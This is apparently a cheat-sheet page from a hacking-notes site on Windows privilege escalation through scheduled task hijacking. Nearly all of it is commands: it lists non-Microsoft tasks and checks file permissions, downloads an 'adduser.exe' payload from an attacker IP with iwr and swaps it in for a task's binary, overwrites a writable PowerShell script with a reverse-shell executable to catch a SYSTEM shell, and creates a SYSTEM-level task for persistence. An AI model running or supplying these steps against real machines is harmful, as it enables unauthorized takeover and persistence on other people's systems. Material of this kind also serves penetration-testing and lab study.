>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / Scheduled Task Hijacking

Scheduled Task Hijacking

Privilege Escalation Windows Tasks windows

Enumerate non-Microsoft tasks

Get-ScheduledTask | where {$_.TaskPath -notlike '\Microsoft*'} | Format-Table TaskName,TaskPath,State

Detail for one task

schtasks /query /tn "TASK_NAME" /V /FO LIST

Inspect ACL on the script the task runs

icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
icacls "C:\DevTools\CleanUp.ps1"

Replace the executable / script

iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exe
move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
move .\BackendCacheCleanup.exe .\Pictures\

Append to a writable PS1 cleanup script

echo C:\PrivEsc\reverse.exe > C:\DevTools\CleanUp.ps1

Wait for the task to fire, catch the SYSTEM shell.

Create your own scheduled task

schtasks /create /ru SYSTEM /sc MINUTE /MO 5 /tn RUNME /tr "\"C:\Tools\sirenMaint.exe\""
schtasks /RUN /TN "RUNME"